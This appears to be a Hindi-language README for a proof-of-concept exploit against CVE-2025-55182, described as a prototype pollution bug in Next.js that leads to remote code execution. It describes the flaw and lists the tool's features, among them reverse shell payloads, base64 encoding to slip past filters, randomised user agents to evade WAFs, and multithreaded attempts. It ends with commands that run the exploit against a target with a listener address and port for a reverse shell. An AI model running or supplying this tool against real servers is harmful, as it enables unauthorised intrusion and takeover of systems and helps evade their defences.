
CVE-2025-55182 के लिए PoC
CVE-2025-55182 नेक्स्टजेएस में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता है जो फ्रेमवर्क के अनुरोध हैंडलिंग तंत्र में अनुचित इनपुट सैनिटाइजेशन के माध्यम से आरसीई (RCE) को सक्षम बनाती है। यह सब इसलिए होता है क्योंकि नेक्स्टजेएस JSON ऑब्जेक्ट्स पर एक अनुभवहीन रूकी की तरह भरोसा करता है।
1) अनुरोध पार्सिंग में प्रोटोटाइप प्रदूषण: नेक्स्टजेएस उन ऑब्जेक्ट्स को ठीक से सैनिटाइज़ नहीं करता जो प्रोटोटाइप चेन को प्रदूषित कर सकते हैं।
2) असुरक्षित डिसीरियलाइज़ेशन: फ्रेमवर्क JSON ऑब्जेक्ट्स को बेस ऑब्जेक्ट प्रोटोटाइप को संशोधित करने की अनुमति देता है।
3) child_process के माध्यम से आरसीई: प्रोटोटाइप चेन को प्रदूषित करके, एक बार प्रोटोटाइप प्रदूषित हो जाने पर, हम तर्क को हाईजैक कर सकते हैं और सर्वर को मनमाना कोड चलाने पर मजबूर कर सकते हैं।
npm create [email protected] vuln
1) रिवर्स शेल पेलोड: लिनक्स/विंडोज रिवर्स शेल
2) फिल्टर को बायपास करने के लिए बेस64 एन्कोडिंग
3) स्वचालित OS पहचान
4) WAF से बचने के लिए यादृच्छिक यूज़र एजेंट
5) विफलता की स्थिति में एक्सपोनेंशियल बैकऑफ़ के साथ पुनर्प्रयास लूप
6) विश्वसनीयता के लिए समवर्ती शोषण प्रयासों हेतु मल्टी-थ्रेडिंग
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof